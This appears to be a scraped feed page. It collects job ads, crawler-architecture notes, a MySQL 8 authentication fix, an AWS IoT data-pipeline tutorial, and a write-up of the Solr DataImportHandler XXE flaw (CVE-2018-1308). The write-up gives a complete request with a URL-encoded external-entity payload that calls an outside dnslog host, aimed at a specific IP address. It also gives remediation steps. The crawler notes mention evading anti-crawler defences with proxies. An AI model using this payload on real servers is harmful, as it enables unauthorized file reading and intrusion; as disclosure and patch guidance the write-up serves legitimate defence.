Male & female; minimum 23 years old; proficient in PHP programming, the HTML language, and MySQL; domiciled in Surabaya, Sidoarjo, Gresik & Mojokerto; owns a personal laptop & motorbike; ready to work part-time; an international or national competency certificate is preferred.

          Job Vacancy: Marketing Support      Cache   Translate Page   Web Page Cache   
Minimum 2 years in application development / website maintenance. Proficient in the Symfony PHP framework, MySQL, HTML. Proficient in graphic design. Male/female, 21-26 years old. Honest, meticulous, and enthusiastic about completing tasks. Incentives: attractive incentives if you can help "close" deals ...

          Sr. Software Engineer 3 - The Kenjya-Trusant Group, LLC - Annapolis Junction, MD      Cache   Translate Page   Web Page Cache   
Java/JEE, JavaScript, Java Expression Language (JEXL), J1BX, Flex, EXT - JS, JSP, .NET, AJAX, SEAM, C, C++, PHP, Ruby / Ruby-on-Rails, SQL, MS SQL Server, MySQL...
From The Kenjya-Trusant Group, LLC - Wed, 11 Apr 2018 21:39:13 GMT - View all Annapolis Junction, MD jobs
          Cloud Native application Engineer      Cache   Translate Page   Web Page Cache   
NJ-Basking Ridge, Terrific Contract Opportunity with a FULL suite of benefits! Position: Cloud Native application Engineer Location: Basking Ridge, New Jersey 07920 Duration: 9 Months Day-to-Day Responsibilities: Developing software primarily in JavaScript: React on the front-end and Node.js on the back-end. SQL knowledge (MySQL or PostgreSQL specifically, indexing, scaling, etc.) Building and maintaining RESTful A
          Intelligent Crawler Architecture      Cache   Translate Page   Web Page Cache   

1. Technology choices

Python + Scrapy (engine, scheduler/URL management, spiders, downloader, hook middleware, data pipelines, etc.)

Java + HtmlParser/Jsoup + Crawler4j/WebMagic/JSpider + HttpClient + Heritrix/Nutch

2. Scenarios

Task start, stop and execution, distribution management, policy push-down, monitoring, etc. A global view of engine information and crawler information.

Crawl targets: websites, web pages, requests, data; selection, cleaning, transformation, deduplication (Bloom filter), merging, buffering, storage, indexing, etc.

Crawling techniques: spiders, requests, anti-crawler evasion (proxy IPs), HTML parsing, JSON parsing, XML parsing with XPath, regular expressions, and deduplication (a small deduplication sketch follows below).
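
As an illustration of the deduplication point above, a minimal Bloom-filter-style URL filter in Python (one of the stacks named in section 1) could look like the sketch below; the bit-array size and hash count are arbitrary and this is not production code:

import hashlib

class BloomFilter:
    """Probabilistic set: no false negatives, a small chance of false positives."""

    def __init__(self, size_bits=1 << 20, num_hashes=5):
        self.size = size_bits
        self.num_hashes = num_hashes
        self.bits = bytearray(size_bits // 8)

    def _positions(self, item):
        for i in range(self.num_hashes):
            digest = hashlib.sha1(f"{i}:{item}".encode("utf-8")).hexdigest()
            yield int(digest, 16) % self.size

    def add(self, item):
        for pos in self._positions(item):
            self.bits[pos // 8] |= 1 << (pos % 8)

    def __contains__(self, item):
        return all(self.bits[pos // 8] & (1 << (pos % 8)) for pos in self._positions(item))

seen = BloomFilter()
for url in ["https://example.com/a", "https://example.com/b", "https://example.com/a"]:
    if url in seen:
        continue          # probably crawled already, skip it
    seen.add(url)
    # fetch_and_parse(url) would go here
    print("would crawl:", url)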

Crawled data handling: text, links, images, video, CSS, JS scripts, etc., and how images & videos are stored.

Crawl target configuration: 1. website/app/H5 information and login information; 2. management of the URLs from which to fetch data; 3. XML configuration of the mapping rules for the fields to extract; 4. execution policy, execution frequency, scheduled crawling.

Crawler execution strategy: 1. crawler classification and crawler node information; 2. registration & being scheduled as a service; 3. health status reporting, heartbeats & health checks; 4. crawler execution logs, error logs, a scheduled re-run strategy for runs reported as complete but with individual failures, and recording/querying/monitoring of execution times; 5. manual crawler operations; 6. bringing crawler nodes online and offline; 7. hot reload of downloaded crawler policy configuration; 8. shared components for collection, parsing, processing, transport, and logging; 9. programming with high-performance queues, messaging, multithreading, and so on.

Crawler management strategy: see the previous item!

Simulated login, proxies, user agents, countering anti-crawler measures, an asynchronous multithreaded HTTP downloader.

Core database model design: merge web + engine into one cluster? A task looks up the engine nodes in ZooKeeper; when the task execution configuration changes, all engines are notified and each decides on its own whether it should execute, then simply starts the task — this simplifies the architecture. A virtual IP mapping mechanism — the corresponding mechanism for engine crashes, restarts, or migration.

1. Web, 2. Engine (server cluster), 3. Crawler (server) cluster

Tasks are managed on the web side; once started, a task is dispatched to an engine using modulo-based sharding. The engine runs a manual or timed scheduler component; the scheduler picks the selected crawlers and pushes down the crawler configuration policy; the crawler cluster executes its own share of the work according to the task queue shards; when finished, results are aggregated back to the scheduler, the scheduler returns them to the engine, the engine updates the task status, and the web UI updates the task execution status in real time via Ajax.

The crawler crash-recovery mechanism relies on a persistent queue: after a crawler restarts, it resumes and finishes the leftover tasks. The engine automatically detects the crawler group and can select crawlers and assign tasks either automatically or manually.

Engine high availability & data consistency: the engine and the web tier are combined, which reduces cluster complexity; no Hadoop-style MetaServer-like mechanism is used.

Crawler high availability & data consistency:

Task-related models, configuration-related models, log-related models, anti-duplication models, etc.

Global task/crawler/engine logging & monitoring & operations & alerting strategy:

1. Log tables (scattered across the modules)

2. Health checks

3. Email alerting module

4. Statistics and analysis module

5. Overall statistics/monitoring/analysis views

6. Thresholds and other configuration

7. Bringing crawler nodes online and offline

8. Hot reload of downloaded crawler policy configuration

9. Shared components for collection, parsing, processing, transport, and logging

10. Programming with high-performance queues, messaging, multithreading, and so on.


• Task model construction & process decomposition:

• Every day / every minute, read the latest posts and all comments under column X on the Weibo home page (dedupe the URLs); keyword extraction, text semantic analysis, sentiment scoring.

• Process decomposition, template configuration, automatic push-down; extract shared, configurable, customizable extension points; sharded, multi-process, multi-threaded, asynchronous high-performance fetching; a URL buffer queue; Disruptor with multiple clients consuming tasks in parallel; multi-threaded Future-based parallel task control. 1. Create a new task. 2. Fetch the URLs. 3. Select a crawler server (or pick one at random). 4. Start the crawler task. 5. Usually it is executed manually right away or as a scheduled job, using the Quartz API or a custom time-slice scheduler to start it. 6. Monitor task execution. 7. Task execution flow: pull the configuration and execute according to it. 8. Fetch the newly updated post entries (the id of the last item pulled is recorded & cached) and the URLs of the latest comment entries, put them into a Berkeley DB queue, and then carry out multi-threaded, multi-process data fetching with downloader and pipeline processing. Categorized logs, compensating re-crawls, alerts on anti-crawler fetch failures, node health monitoring, status updates and alerting. After recovery the node is restarted; the node's crawl progress is persisted to a local file and to the Berkeley DB persistent queue, so if the engine was already told the fetch succeeded, the node finishes this task after local recovery, and logs exist for it. (Crawler tasks interrupted by a deployment are re-run here, or wait for the engine to re-run them or for the next scheduling cycle.)

Crawler task distribution strategy, to guarantee high reliability:

1. The task goes to the engine, which selects a crawler group (single or multiple mode).

2. A single task is handled by one crawler (preferred).

3. A complex task is handled by several crawlers together; the engine distributes the sub-task URLs to them.

4. The engine exposes an RPC interface to the web tier for dispatching tasks.

5. The engine schedules periodically and assigns tasks to crawlers to carry out the data crawling.

6. When a crawler finishes a task, it asynchronously updates the crawler task log status and calls back to the engine.

7. The engine reports to the web tier and the crawlers report to the engine, via RPC callbacks.

8. Failure recovery mechanism & global alerting/monitoring mechanism:

If the engine dies, tasks cannot be scheduled on time; after a restart it reads the task status and latest progress logs from the database, continues scheduling anything that was not stopped, and logs the completion report when tasks finish.

If a crawler dies, its task is not finished and not reported. No new tasks are dispatched to it; crawler node liveness is detected automatically.

After a restart, the crawler continues its unfinished tasks and temporarily accepts no new tasks; or it accepts new tasks, depending on the chosen policy. -- Not adopted.

Reporting & resumption mechanism: the web tier automatically detects engine and crawler information, the engine automatically detects crawler information, and a crawler task temporarily caches the scheduling engine's information so that it can complete its report. Tables: the task model table, the latest-task-progress table, the status log table.

The overall task is sharded to one engine and recorded in the database; the engine starts, loads the task, schedules it periodically, and crawls data from the task's last recorded position. If the engine fails, the task is automatically and temporarily assigned to another backup engine for execution, recorded in the backup-engine field; after recovery the primary engine takes over again. After the engine restarts, it resumes the scheduling of the tasks it owns, accepts new tasks, re-runs the scheduling once from the interrupted run, and then continues at the configured frequency. Manually triggering a single run is also supported.

When a single crawler is scheduled, it updates the progress on completing the task; on failure the latest task progress is not updated, and after a restart the engine will, on the next scheduling round, have this crawler or another one execute from that progress point, updating the task's executing-crawler IP. When several crawlers are scheduled, the overall task progress is only updated — and the cached pending-task state destroyed — once all of them have reported and the report counter is reached. A single-threaded task scan raises alerts for unfinished tasks that exceed the estimated average duration, and flags long-unfinished tasks for deletion (a crawler failure would otherwise leave the task failing forever); otherwise the crawl was wasted and has to be redone. Deduplication relies on database unique keys && anti-duplication design in the program. A crawler failure means the task failed; it simply gets rescheduled next time.

Crawlers are stateless: they do the work and only report to the engine when done; the engine considers the task successful and updates the task progress flag only when the single crawler — or all of the crawlers — have reported completion.

Anti-duplication mechanism design: a table keeps the last week's deduplication data. For example, if a task dies halfway and its latest progress cannot be confirmed, re-running it would produce a lot of duplicate data, so the anti-duplication table & cache intercept it first. You cannot rely solely on database unique-key constraints to prevent duplicates, both when saving data and in scenarios where the data is not stored in a database at all.

Every task and every crawler has task-log monitoring, which makes troubleshooting easier.

• Data processing, storage, and application: data model construction, classification, caching, HDFS files, Hive tables, HBase tables, MongoDB for storing web page text data, FastDFS for small images and small video files.

Distributed data storage design: for large data volumes, classify and consolidate the data tables, use partitioned tables, and shard by database or table; at big-data scale use spider + Kafka + Storm/Hadoop (HDFS) + Redis + MySQL for processing, with files and MongoDB for web page data, and a split between online analysis and offline storage.

Crawler high-performance strategy design: queues, caching, multithreading, Berkeley DB, asynchronous network programming.

Search architecture design for crawler data: see the search architecture design slides.

Text analytics on crawler big data: NLP, topic extraction, hot-topic monitoring, tag clouds, and public opinion analysis applications.

6. Applications

User credit data

Brand public opinion monitoring

Government public opinion monitoring

Competitive business intelligence: e-commerce competitor price comparison, e.g. a PIS system comparing YHD D5 prices against JD prices, with intelligent repricing.

Vertical industry information gathering

General-purpose search engines

Unlimited-depth crawlers, such as Google, Baidu, Bing, Sogou, 360 Search, etc.

Specialized crawlers for vertical industries, e-commerce, and so on, with limited or customized crawl depth.

By application mode:

Offline crawlers: data storage, indexing or querying, offline analysis, etc.

Online crawlers: crawl data in real time and process it in real time, e.g. intelligent price comparison and repricing.



          XXE Vulnerability in the Solr DIH dataConfig Parameter      Cache   Translate Page   Web Page Cache   

Someone else's CVE, numbered CVE-2018-1308. I happened to come across it today, and since I have built a service with Solr before, here is a quick write-up.

0x01 Background

DataImportHandler (DIH) is mainly used to pull data from a database and build an index. Once Solr is set up and the data has been inserted into MySQL or another database, you need to create a core and generate an index over the data in that database, and DIH is used when generating that index.

When the Solr web console is used to run a data import for a core, the dataConfig parameter is vulnerable to XXE: an attacker can submit malicious XML to the server and use it to read sensitive files, directories, and so on from the attacked server.

Affected versions:

Solr 1.2 to 6.6.2

Solr 7.0.0 to 7.2.1

Links to the original advisory:

https://issues.apache.org/jira/browse/SOLR-11971

http://seclists.org/oss-sec/2018/q2/22

0x02 Testing the vulnerability

1. Open the Solr Admin console;

2. Select an existing core, then click the DataImport function;

3. When clicking "Execute", capture the traffic to obtain the concrete DataImport request.

You can also access the feature's entry URL directly:

http://www.nxadmin.com/solr/#/corename/dataimport

Taking Solr 6.0.1 as an example, the captured test request looks like this:

POST /corename/dataimport?_=1531279910257&indent=on&wt=json HTTP/1.1
Host: 61.133.214.178:9983
Content-Length: 282
Accept: application/json, text/plain, */*
Origin: http://www.nxadmin.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Content-type: application/x-www-form-urlencoded
Referer: http://www.nxadmin.com/solr/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

command=full-import&verbose=false&clean=false&commit=false&optimize=false&core=xxetest

The vulnerable dataConfig parameter is not present in the default request; instead, the configuration-file approach is used, where data-config.xml contains the MySQL connection settings and the fields of the tables that need to be indexed. The relevant code snippet for the non-default request parameters:

package org.apache.solr.handler.dataimport;
......
public class RequestInfo {
  private final String command;
  private final boolean debug;  
  private final boolean syncMode;
  private final boolean commit; 
  private final boolean optimize;
  ......
  private final String configFile;
  private final String dataConfig;

  public RequestInfo(SolrQueryRequest request, Map<String,Object> requestParams, ContentStream stream) {
  
  ......
  
    String dataConfigParam = (String) requestParams.get("dataConfig");
    if (dataConfigParam != null && dataConfigParam.trim().length() == 0) {
      // If the dataConfig parameter value is empty, set the parameter to null
      dataConfigParam = null;
    }
    dataConfig = dataConfigParam;
    
 ......
 
   public String getDataConfig() {
    return dataConfig;
  }
  
 ......
 
}

With the request above you can add the dataConfig parameter yourself, so the concrete vulnerability test request looks like this:

POST /corename/dataimport?_=1531279910257&indent=on&wt=json HTTP/1.1
Host: 61.133.214.178:9983
Content-Length: 282
Accept: application/json, text/plain, */*
Origin: http://www.nxadmin.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Content-type: application/x-www-form-urlencoded
Referer: http://www.nxadmin.com/solr/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

command=full-import&verbose=false&clean=false&commit=false&optimize=false&core=xxetest&dataConfig=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E %3C!DOCTYPE+root+%5B%3C!ENTITY+%25+remote+SYSTEM+%22http%3A%2F%2Fsolrxxe.8ug564.ceye.io%2Fftp_xxe.xml%22%3E%25remote%3B%5D%3E
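
For readability, the dataConfig value in the request above is simply a URL-encoded XXE document type declaration that points at an external DTD. Decoding it (a convenience step added here, not part of the original write-up) shows the plain payload; a quick check in Python:

from urllib.parse import unquote_plus

encoded = ("%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E"
           "+%3C!DOCTYPE+root+%5B%3C!ENTITY+%25+remote+SYSTEM+"
           "%22http%3A%2F%2Fsolrxxe.8ug564.ceye.io%2Fftp_xxe.xml%22%3E%25remote%3B%5D%3E")

# Prints the decoded payload on one line:
# <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [<!ENTITY % remote SYSTEM "http://solrxxe.8ug564.ceye.io/ftp_xxe.xml">%remote;]>
print(unquote_plus(encoded))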

The above is the test payload provided by the vulnerability's discoverer; it uses DNS logging (dnslog) to prove that the vulnerability exists (the original write-up includes a screenshot of the resulting DNS log entry).


0x03 Remediation & mitigation

1. Upgrade to version 6.6.3 or 7.3;

2. Or restrict the Solr Admin console to the internal network;

3. Taking 6.0.1 as an example, you can put HTTP 401 authentication in front of the console. 6.0.1 ships with no authorization at all, so anonymous users can reach the admin console directly, and 401 authentication has to be configured separately. When configuring it, make sure every main functional request URL is covered by the 401 authentication; otherwise an attacker may bypass it by calling those functional requests directly.


          Project for Sergey G.      Cache   Translate Page   Web Page Cache   
Hello i need someone to check on replication, and also do monthly maintenance on MSSQL databases. the first job should be quick, but could last monthly. (Budget: $100 USD, Jobs: ASP, Hire me, Javascript, MySQL, PHP, WordPress)
          SAP Online Training      Cache   Translate Page   Web Page Cache   
We offer online training We are looking for Online Trainers on below technologies: SAP BW HANA SAP HANA Admin (Budget: $30 - $250 USD, Jobs: Moodle, MySQL, Oracle, PHP, SAP)
          All Skills People Required For several Projects      Cache   Translate Page   Web Page Cache   
Hi We have started a new organisation and we need people for multiple skills. We need people for long term projects. We have projects related to different skill sets. 1) Graphic Design 2) Web Design... (Budget: $3000 - $5000 USD, Jobs: MySQL, PHP, Python, vBulletin, WordPress)
          Visual basic expert Small urgent job      Cache   Translate Page   Web Page Cache   
I need the Visual basic expert freelancer for my current project. Details will be shared with winning bidder. Please bid if you have the experience. (Budget: $250 - $750 USD, Jobs: Graphic Design, MySQL, PHP, Software Architecture, Visual Basic)
          Fix 'this authentication plugin is not supported' issue while using Go to connect MySQL 8      Cache   Translate Page   Web Page Cache   
MySQL 8 has changed its default authentication plugin from mysql_native_password to caching_sha2_password to improve security. However, many third-party libraries have been slow to catch up with this change, which causes compatibility issues when they connect to MySQL. One of these issues shows up in Go libraries when they try to connect to MySQL 8. The specific error has been observed […]
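
One widely used server-side workaround — shown here as a sketch, not necessarily the fix the original article goes on to describe — is to switch the affected account back to the legacy plugin until the client driver understands caching_sha2_password; the account name, host, and passwords below are placeholders:

import mysql.connector  # assumption: any client that can already talk to the MySQL 8 server

conn = mysql.connector.connect(host="127.0.0.1", user="root", password="root-password")
cur = conn.cursor()

# Re-point the application account at the pre-8.0 authentication plugin.
cur.execute(
    "ALTER USER 'app_user'@'%' IDENTIFIED WITH mysql_native_password BY 'app-password'"
)

cur.close()
conn.close()

The longer-term fix is simply to upgrade the client library, since newer releases of the common MySQL drivers added native support for the new plugin.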
          Web Applications Developer - OPW - De Pere, WI      Cache   Translate Page   Web Page Cache   
Relational database, modern schema-less scalable databases, SQL, MySQL, MongoDB, etc. For over 30 years, PDQ Manufacturing, Inc., has provided the vehicle wash...
From Dover Corporation - Fri, 18 May 2018 20:37:55 GMT - View all De Pere, WI jobs
          Develop Website for Youth Community Service Non-profit Organization      Cache   Translate Page   Web Page Cache   
Looking to have a small responsive website design for a Non-profit Community Service organization. The website will run on a Linux hosted server with MySQL. The website needs to include the following; Four (3) Slider images on the home... (Budget: $250 - $750 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Uniface Developer - Oscar Technology - Rossendale      Cache   Translate Page   Web Page Cache   
Uniface Developer - Uniface - MySQL - Rossendale. Two Uniface Developers are required for a 6 month initial contract with my client....
From Oscar Technology - Thu, 05 Jul 2018 16:55:05 GMT - View all Rossendale jobs
          Sensor Data Processing on AWS using IoT Core, Kinesis and ElastiCache      Cache   Translate Page   Web Page Cache   

This blog post is part of my AWS series:

Introduction

Internet of Things (IoT) became a hot topic in the recent years. Companies are forecasting billions of connected devices in the years to come. IoT applications have different characteristics than traditional software projects. Applications operate on constrained hardware, network connections are unreliable, and the data coming from many different sensors need to be available in near real-time.

With the rise of cheap and widely available microprocessors and microcontrollers like the Raspberry Pi and Arduino products, the barrier of entry for working on IoT products has been lowered significantly. The software and development tool stack has matured as well.

In December 2015 AWS IoT became generally available. AWS IoT is a collection of products to manage and connect IoT devices to the cloud. Its IoT Core product acts as the entry point. IoT Core accepts data via MQTT and then processes and forwards it to other AWS services according to preconfigured rules.

In this blog post we want to build an exemplary sensor data backend powered by IoT Core, Kinesis, Lambda, ElastiCache, Elastic Beanstalk, and S3. The goal is to accept sensor data, persist it in an S3 bucket, and at the same time display a live feed on the web. The architecture should be extensible so we can add more functionality like analytics or notifications later.

The remainder of the post is structured as follows. First we will present the architecture overview. Afterwards we are going to deep dive into the implementation. We will omit going into details about the VPC and networking part as well as the Elastic Beanstalk deployment as this has been discussed in previous posts already. We close the blog post by discussing the main findings.

Architecture

architecture overview

IoT Core acts as the MQTT message broker. It uses topics to route messages from publishers to subscribers. Whenever a message is published to a topic, all subscribers will be notified about the message. IoT core allows us to send messages to other AWS services efficiently using rules. A rule corresponds to a SQL select statement which defines when it should be triggered, e.g. for all messages from a certain topic.

Each rule can have multiple actions associated with it. An action defines what should happen to the selected messages. There are many different actions supported but we are only going to use the Firehose and Kinesis actions in the course of this post.

The Firehose action forwards the messages to a Kinesis Firehose delivery stream. Firehose collects messages for a configured amount of time or until a certain batch size is reached and persists it to the specified location. In our case we would like to persist the messages as small batches in an S3 bucket.

A Kinesis data stream is used to decouple the processing logic from the data ingestion. This enables us to asynchronously consume messages from the stream by multiple independent consumers. As the message offset can be managed individually by each consumer we can also decide to replay certain messages in case of downstream failure.

The main data processing is happening within our Lambda function. A convenient way to process a Kinesis data stream with a Lambda function is to configure the stream as an event source. We will use this stream-based model, because Lambda polls the stream for you and when it detects new records, invokes your function, passing the new records as a parameter. It is possible to add more consumers to the data stream, e.g., an Akka Streams application that allows more granular control of the message digestion.

The Lambda function will update a Redis instance managed by ElastiCache. In our example we will increment a message counter for each record, as well as storing the last message received. We are using Redis' Pub/Sub functionality to notify our web application, which updates all the clients through a WebSocket connection.

We are going to use the MQTT test client built into IoT core for publishing messages to our topic. As an outlook please find an animation of the final result below. Let's look into the implementation step by step in the next section.

demo

Implementation

Development Tool Stack

To develop the solution we are using the following tools:

  • Terraform v0.11.7
  • SBT 1.0.4
  • Scala 2.12.6
  • IntelliJ + Scala Plugin + Terraform Plugin

The source code is available on GitHub. Now let's look into the implementation details of each component.

IoT Core

iot core

When working with IoT core there is no setup required. Every AWS account is able to use the MQTT broker as a fully managed service out of the box. So the only thing we need to do is to configure our topic rule and the respective actions forwarding messages to Kinesis and Firehose.

resource "aws_iot_topic_rule" "rule" {
  name        = "${local.project_name}Kinesis"
  description = "Kinesis Rule"
  enabled     = true
  sql         = "SELECT * FROM 'topic/${local.iot_topic}'"
  sql_version = "2015-10-08"

  kinesis {
    role_arn    = "${aws_iam_role.iot.arn}"
    stream_name = "${aws_kinesis_stream.sensors.name}"
    partition_key = "$${newuuid()}"
  }

  firehose {
    delivery_stream_name = "${aws_kinesis_firehose_delivery_stream.sensors.name}"
    role_arn = "${aws_iam_role.iot.arn}"
  }
}

The rule will be triggered for all messages in the topic/sensors topic. Using newuuid() as a partition key for Kinesis is fine for our demo as we will anyway have only one shard. In a productive scenario you should think about choosing the partition key in a way that fits your requirements.

The execution roles used need to allow the kinesis:PutRecord and firehose:PutRecord action, respectively. Here we are using the same role twice but I recommend to setup two roles with the least possible permissions.

Now that we have the rule configured, let's create the Firehose delivery stream and the Kinesis data stream next.

Firehose Delivery Stream

firehose delivery stream

To setup the Firehose delivery stream we specify the destination type (s3) and configure it accordingly. As we created S3 buckets multiple times throughout this series we will omit the bucket resource here. The two parameters buffer_size (MB) and buffer_interval (s) control how long we are waiting for new data to arrive before persisting a partition to S3.

resource "aws_kinesis_firehose_delivery_stream" "sensors" {
  name        = "${local.project_name}-s3"
  destination = "s3"

  s3_configuration {
    role_arn        = "${aws_iam_role.firehose.arn}"
    bucket_arn      = "${aws_s3_bucket.sensor_storage.arn}"
    buffer_size     = 5
    buffer_interval = 60
  }
}

The execution role needs to have permissions to access the S3 bucket as well as the Kinesis stream. Please find the policy document used below.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "s3:AbortMultipartUpload",
        "s3:GetBucketLocation",
        "s3:GetObject",
        "s3:ListBucket",
        "s3:ListBucketMultipartUploads",
        "s3:PutObject"
      ],
      "Resource": [
        "${aws_s3_bucket.sensor_storage.arn}",
        "${aws_s3_bucket.sensor_storage.arn}/*"
      ]
    },
    {
      "Effect": "Allow",
      "Action": [
        "kinesis:DescribeStream",
        "kinesis:GetShardIterator",
        "kinesis:GetRecords"
      ],
      "Resource": "${aws_kinesis_stream.sensors.arn}"
    }
  ]
}

This should have our raw data persistence layer covered. All incoming messages will be dumped to S3. Let's tend to the Kinesis data stream next which is important for the data processing.

Kinesis Data Stream

kinesis data stream

The Kinesis data stream will have only one shard and a retention period of 24 hours. Each shard supports a certain read and write throughput, limited in the number and size of requests per time. You can scale out by adding more shards to your stream and choosing an appropriate partition key. We will keep the data for 24 hours, which is included in the base price.

resource "aws_kinesis_stream" "sensors" {
  name             = "${local.project_name}"
  shard_count      = 1
  retention_period = 24
}

Next, let's take a closer look at our Lambda function.

Lambda

lambda

By now you should already be familiar with creating Lambda handlers. This time we will make use of an additional library which will allow AWS to handle the deserialization of the KinesisEvent input automatically: aws-lambda-java-events. We also have to include amazon-kinesis-client and aws-java-sdk-kinesis.

The connection to Redis is done using the net.debasishg.redisclient package. Let's look at the code first and then go through it step by step.

class Handler extends RequestHandler[KinesisEvent, Void] {

  val port = System.getenv("redis_port").toInt
  val url = System.getenv("redis_url")

  override def handleRequest(input: KinesisEvent, context: Context): Void = {
    val logger = context.getLogger
    val redis = new RedisClient(url, port)
    val recordsWritten = input.getRecords.asScala.map { record =>
      val data = new String(record.getKinesis.getData.array())
      redis.set("sensorLatest", data)
      redis.incr("sensorCount")
    }
    redis.publish(
      channel = "sensors",
      msg = "updated"
    )
    val successAndFailure = recordsWritten.groupBy(_.isDefined).mapValues(_.length)
    logger.log(s"Successfully processed: ${successAndFailure.getOrElse(true, 0)}")
    logger.log(s"Failed: ${successAndFailure.getOrElse(false, 0)}")
    null
  }

}

Here's what happens:

  • Read $redis_url and $redis_port environment variables (error handling omitted)
  • For each incoming KinesisEvent, the Lambda function will be invoked. The event contains a list of records since the last invocation. We will see later how we can control this part.
  • Connect to the ElastiCache Redis instance. It might make sense to reuse the connection by setting it up outside of the request handling method. I am not sure about the thread safety and how AWS Lambda handles the object creation.
  • For each message update the latest message value and increase the counter. It would be more efficient to aggregate all records locally within the Lambda and update Redis with the results of the whole batch but I was too lazy to do that.
  • Publish to the sensors channel that new data has arrived so all clients can be notified.

As usual we have to define our Lambda resource. The Redis connection details will be passed via environment variables.

resource "aws_lambda_function" "kinesis" {
  function_name    = "${local.project_name}"
  filename         = "${local.lambda_artifact}"
  source_code_hash = "${base64sha256(file(local.lambda_artifact))}"
  handler          = "de.frosner.aws.iot.Handler"
  runtime          = "java8"
  role             = "${aws_iam_role.lambda_exec.arn}"
  memory_size      = 1024
  timeout          = 5

  environment {
    variables {
      redis_port = "${aws_elasticache_cluster.sensors.port}"
      redis_url  = "${aws_elasticache_cluster.sensors.cache_nodes.0.address}"
    }
  }
}

Last but not least we tell Lambda to listen to Kinesis events, making it poll for new messages. We choose the LATEST shard iterator, which corresponds to moving the offset always to the latest data, consuming every message only once. We could also decide to consume all records (TRIM_HORIZON) or starting from a given timestamp (AT_TIMESTAMP).

The batch size controls the maximum amount of messages processed by one Lambda call. Increasing it has a positive effect on the throughput, while on the other hand a small batch size might lead to better latency. Here's the Terraform resource definition for our event source mapping.

resource "aws_lambda_event_source_mapping" "event_source_mapping" {
  batch_size        = 10
  event_source_arn  = "${aws_kinesis_stream.sensors.arn}"
  enabled           = true
  function_name     = "${aws_lambda_function.kinesis.id}"
  starting_position = "LATEST"
}

In order to push data to the web layer, we will create our ElastiCache Redis instance in the following section.

ElastiCache Redis

redis

We will use a single cache.t2.micro instance running Redis 4.0. Similar to RDS we can also pass the apply_immediately flag to force updates even if outside the maintenance window.

resource "aws_elasticache_cluster" "sensors" {
  cluster_id           = "${local.project_name}"
  engine               = "redis"
  node_type            = "cache.t2.micro"
  num_cache_nodes      = 1
  parameter_group_name = "default.redis4.0"
  port                 = "${var.redis_port}"
  security_group_ids   = ["${aws_security_group.all.id}"]
  subnet_group_name    = "${aws_elasticache_subnet_group.private.name}"
  apply_immediately    = true
}

That's it! What is left is only the Elastic Beanstalk application for the UI.

Elastic Beanstalk Web UI

elastic beanstalk web ui

The Elastic Beanstalk application consists of a frontend and a backend. The frontend is in form of a single HTML file with JavaScript and CSS. Nothing fancy going on there. The backend is written in Scala and utilizes the same Redis library we already used in the Lambda function, as well as Akka HTTP for serving the static files and handling the WebSocket connections.

Frontend

The frontend will feature three outputs: The message count, the last message, and when it received the last update from the server. Below you will find a screenshot of the UI and the HTML code.

frontend

<html>
<head>
    <title>Sensor Data Example</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script src="http://fargo.io/code/jquery-1.9.1.min.js"></script>
    <link href="http://fargo.io/code/ubuntuFont.css" rel="stylesheet" type="text/css">
    <script src="main.js"></script>
</head>
<body>
<div>
    <p>Message count: <span id="messageCount"></span></p>
    <p>Last message: <span id="lastMessage"></span></p>
    <p>Last update: <span id="lastUpdate"></span></p>
</div>
<script>
$(document).ready(WebSocketTest);
</script>
</body>
</html>

The JavaScript part is also rather straightforward. We will use the built-in WebSocket support and provide handlers for onopen, onmessage, and onclose events. The onmessage event will parse the data received and fill the appropriate text fields. Note that we have to build the WebSocket URL using window.location, because it has to be an absolute URL in all the browsers I know.

var loc = window.location, protocol;
if (loc.protocol === "https:") {
    protocol = "wss:";
} else {
    protocol = "ws:";
}
var socketUrl = protocol + "//" + loc.host + loc.pathname + "ws";

function WebSocketTest() {
  if ("WebSocket" in window) {
    console.log("Connecting to " + socketUrl);
    var ws = new WebSocket(socketUrl);

    ws.onopen = function() {
      console.log("Connection established");
    };

    ws.onmessage = function (evt) {
      var msg = JSON.parse(evt.data);
      console.log("Message received: " + msg);
      $("#lastUpdate").text(new Date());
      $("#lastMessage").text(msg.latest);
      $("#messageCount").text(msg.count);
    };

    ws.onclose = function() {
      console.log("Connection closed");
    };
  } else {
     console.error("WebSocket not supported by your browser!");
  }
}

Backend

The backend consists of an Akka HTTP web server and two Redis connections. We have to use two connections here because Redis does not allow using the same connection for Pub/Sub and normal key value operations at the same time.

Let's look into the code. As always you need to have an actor system, actor materializer, and execution context if required. We are going to omit this for brevity reasons. Setting up the HTTP server with WebSocket support is illustrated in the following listing. We are routing two paths, one for the WebSocket connection and one for the static HTML file, which contains all JavaScript and CSS inline. We ignore all incoming messages and will forward messages coming from Redis to all clients. Both interface and port will be passed by Elastic Beanstalk.

val route =
  path("ws") {
    extractUpgradeToWebSocket { upgrade =>
      complete(upgrade.handleMessagesWithSinkSource(Sink.ignore, redisSource))
    }
  } ~ path("") {
    getFromResource("index.html")
  }

val interface = Option(System.getenv("INTERFACE")).getOrElse("0.0.0.0")
val port = System.getenv("PORT").toInt
val bindingFuture = Http().bindAndHandle(route, interface, port)

The next task is to define the Redis source. The Redis Pub/Sub API requires a callback function that is invoked for every message in the subscribed channel. This is not compatible with Akka Streams out of the box, so we have to use a little trick to transform our Redis messages to a Source object. The following listing illustrates the Redis source creation as well as the channel subscription.

val redis_port = System.getenv("redis_port").toInt
val redis_url = System.getenv("redis_url")
val redis = new RedisClient(redis_url, redis_port)
val redisPubSub = new RedisClient(redis_url, redis_port)

val (redisActor, redisSource) =
  Source.actorRef[String](1000, OverflowStrategy.dropTail)
    .map(s => TextMessage(s))
    .toMat(BroadcastHub.sink[TextMessage])(Keep.both)
    .run()
